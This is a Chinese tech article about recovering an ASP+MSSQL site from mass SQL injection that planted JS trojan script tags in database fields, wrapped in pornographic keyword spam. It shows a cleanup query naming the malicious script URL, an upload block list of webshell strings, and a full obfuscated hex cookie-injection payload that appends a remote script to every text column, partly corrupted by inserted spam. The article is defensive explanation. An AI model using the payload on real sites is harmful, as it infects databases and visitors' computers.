亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > ASP > 正文

ASP+MSSQL2000 數據庫被批量注入后的解決方法第1/2頁

2024-05-04 11:09:42
字體:
來源:轉載
供稿:網友
這陣子,采用ASP+MSSQL設計的很多網站可能遭遇到sql數據庫被掛馬者插入JS木馬的經歷;這不,朋友的一個網站就被黑客忽悠了一把

mssql的每個varchar、text字段都被自動插入一段js代碼,即使刪除這段代碼,如果沒有從源頭上解決,幾分鐘后,js代碼就又會自動插入數據庫。
經過飄易的觀察,這很有可能是程序自動執行的,黑客先從搜索引擎google、百度等搜索存在漏洞的采用asp+mssql設計的網站,然后采用小明子這樣的注入掃描工具,掃描整個網站,一旦發現有sql注入的漏洞或者上傳漏洞,黑客就通過各種手段,上傳自己的大馬,如海陽木馬;然后,黑客就把這個網站納入他的肉雞列表,隨時在數據庫里加入自己希望加的js代碼,而這些代碼往往是包含著眾多的的病毒、木馬,最終讓訪問受控網站的用戶的電腦中毒。
雖然,可以通過sql查詢分析器執行批量代換,暫時解決被插入的js代碼問題,然而不從根本上解決整個網站存在的漏洞,包括程序上和服務器安全權限,那么黑客還是隨時可以入侵你的網站數據庫。
在sql查詢分析器里可以執行以下的代碼批量替換js代碼:

復制代碼 代碼如下:


“ update 表名 set 字段名=replace(字段名,'<Script Src=http://c.n%75clear3.com/css/c.js></Script>','') ”


flymorn仔細檢查了網站,發現網站存在幾個安全問題:
第一,網站存在上傳漏洞;雖然,上傳文件需要管理員身份驗證,也對上傳文件進行了文件格式的認證,但管理員身份驗證采用了cookies,而cookies是可以被偽造的,而且如果上傳了圖片后,不對該文件的內容采取任何判斷的話,那么圖片木馬也很有可能被上傳。
解決措施:1 刪除上傳文件功能(不太實際);2 修改上傳用戶驗證為session驗證;3 對上傳后的文件內容進行驗證,如果是圖片木馬,則刪除;可以參考以下的驗證代碼:

復制代碼 代碼如下:


''===============判斷上傳文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write("<script>alert('您上傳的文件有問題,上傳失??!');history.back();</script>")
Response.End
end if
next
''=================判斷上傳文件是否含非法字符串end===================


第二,網站存在cookies注入漏洞。由于程序設計中,為了考慮到減小服務器的開銷,所有用戶登陸后采用cookies驗證,這個cookies里保存了用戶的 ID 和 NAME ,而眾所周知,cookies是經常被黑客偽造的,這是其一;另外,某些外部參數 沒有采用嚴格的 request.form 和 request.querystring 來獲取內容,為了簡便,采用了 request("id") 這樣的方式。

我們知道,ASP 的request 是先從form、querystring里獲取內容,如果這兩個為空,則要從cookies里獲取內容,大家往往在程序設計中考慮到了 request.form 和 request.querystring 的SQL注入,所以一般都會過濾 request.form 和 request.querystring進行sql注入;但卻偏偏忘了過濾cookies方式下的注入。我們來看下下面這樣的sql語句:

復制代碼 代碼如下:


SQL="select * from 表名 whereid")


如果這個 id 恰巧是通過cookies來獲取值的,那么想想,這是一件多么可怕的事??!注入者可以輕松的偽造一個名為 id 的虛假 cookies ,因為這個 id 的cookies 是服務器分配給它的。這個cookies可以被偽造成類似下面這樣的一段代碼:

復制代碼 代碼如下:


dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網() 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
亚洲精品福利资源站| 欧美激情视频在线观看| 久久露脸国产精品| 欧美性猛交xxxx免费看久久久| 欧美日韩午夜激情| 欧美高跟鞋交xxxxxhd| 久久久久久久久久亚洲| 精品视频—区二区三区免费| 亚洲日韩欧美视频一区| 国产乱肥老妇国产一区二| 精品国产一区二区三区四区在线观看| 亚洲欧洲第一视频| 久久久久久久久久av| 九九热在线精品视频| 久久精品国产99国产精品澳门| 国产啪精品视频| 亚洲欧美另类自拍| 日本欧美一二三区| 久久成人精品视频| 美女扒开尿口让男人操亚洲视频网站| 日韩美女主播视频| 国产在线999| 中文字幕一区二区精品| 国产精品1区2区在线观看| 亚洲欧美国产va在线影院| 久久亚洲精品网站| 中文字幕亚洲一区二区三区| 国产精品夜间视频香蕉| 91沈先生作品| 亚洲精品国产精品国产自| 91久久久久久久久久久| 久久激情五月丁香伊人| 国产成人亚洲精品| 亚洲精品成人久久久| 国产乱人伦真实精品视频| 日韩国产欧美精品在线| 国模吧一区二区三区| 欧美性资源免费| 海角国产乱辈乱精品视频| 国产精品看片资源| 97久久精品在线| 国产日产亚洲精品| 亚洲成色www8888| 亚洲欧洲在线免费| 精品视频9999| 97免费视频在线播放| 欧美日本在线视频中文字字幕| 亚洲人成77777在线观看网| 九九热最新视频//这里只有精品| 国产www精品| 91在线播放国产| 亚洲精品乱码久久久久久按摩观| 96sao精品视频在线观看| 精品在线观看国产| 国产精品十八以下禁看| 中文字幕亚洲自拍| 裸体女人亚洲精品一区| 欧美日韩激情视频8区| 亚洲一区中文字幕| 亚洲欧洲在线视频| 欧美丝袜第一区| 国产精品毛片a∨一区二区三区|国| 精品国产成人av| 日韩av在线影院| 国产日韩精品电影| 日韩精品免费电影| 国产精品扒开腿做爽爽爽视频| 精品国内亚洲在观看18黄| 欧美疯狂性受xxxxx另类| 欧美成人剧情片在线观看| 亚洲精品www久久久久久广东| 亚洲毛茸茸少妇高潮呻吟| 91精品视频大全| www.99久久热国产日韩欧美.com| 欧美在线播放视频| 久久亚洲精品国产亚洲老地址| 国产精品一二三在线| 国产精品成人观看视频国产奇米| 亚洲石原莉奈一区二区在线观看| 亚洲欧美激情一区| 在线a欧美视频| 亚洲精品大尺度| 91精品国产九九九久久久亚洲| 在线成人中文字幕| 国产69精品99久久久久久宅男| 国产成人av在线播放| 亚洲激情视频网| 欧美中文字幕在线| 久久久久久国产精品美女| 亚洲视频精品在线| 国产精品视频999| 中文字幕亚洲无线码a| 久久99青青精品免费观看| 久久国产精品久久久久久久久久| 日本免费久久高清视频| 色视频www在线播放国产成人| 国产精品一二三在线| 久久精品国产2020观看福利| 狠狠久久亚洲欧美专区| 成人欧美一区二区三区黑人孕妇| 精品国内亚洲在观看18黄| 亚洲精品720p| 国产精品午夜一区二区欲梦| 人人做人人澡人人爽欧美| 亚洲成人性视频| 国产精品美腿一区在线看| 97精品伊人久久久大香线蕉| 亚洲香蕉伊综合在人在线视看| 日韩精品视频观看| 国产精品爽爽爽爽爽爽在线观看| 亚洲精品久久久久久久久久久久| 韩曰欧美视频免费观看| 深夜福利91大全| 日韩中文字幕精品视频| 日韩暖暖在线视频| 欧美电影在线免费观看网站| 欧美激情视频网址| 国产精品久久久久久久久久久久久| 国产精品69av| 亚洲成人激情小说| 精品国产老师黑色丝袜高跟鞋| 国产亚洲视频在线观看| 国产成人高清激情视频在线观看| 久久伊人免费视频| 亚洲美女av电影| 精品国产视频在线| 中文字幕不卡在线视频极品| 欧美激情欧美激情在线五月| 91精品在线播放| 欧美韩国理论所午夜片917电影| 久久6精品影院| 欧美日韩中国免费专区在线看| 91人人爽人人爽人人精88v| 国产日韩在线精品av| 国产精品日日摸夜夜添夜夜av| 欧美午夜精品久久久久久久| 欧美与黑人午夜性猛交久久久| 国产精品香蕉在线观看| 中文字幕日韩欧美精品在线观看| 日韩欧美在线看| 在线看国产精品| 88国产精品欧美一区二区三区| 超碰日本道色综合久久综合| 亚洲第一中文字幕在线观看| 亚洲免费伊人电影在线观看av| 日韩av电影免费观看高清| 午夜精品在线视频| 草民午夜欧美限制a级福利片| 欧美黄色性视频| 欧美极品在线视频| 亚洲字幕在线观看| 亚洲日韩欧美视频| 亚洲片国产一区一级在线观看| 91中文精品字幕在线视频| 国产日韩欧美91| 国产mv免费观看入口亚洲| 久久久久久国产三级电影| 国产精品视频在线观看| 91精品在线播放| 国产精品久久久久久婷婷天堂| 久久久精品国产一区二区| 欧美午夜激情小视频| 亚洲精品乱码久久久久久金桔影视| 91久久国产精品91久久性色|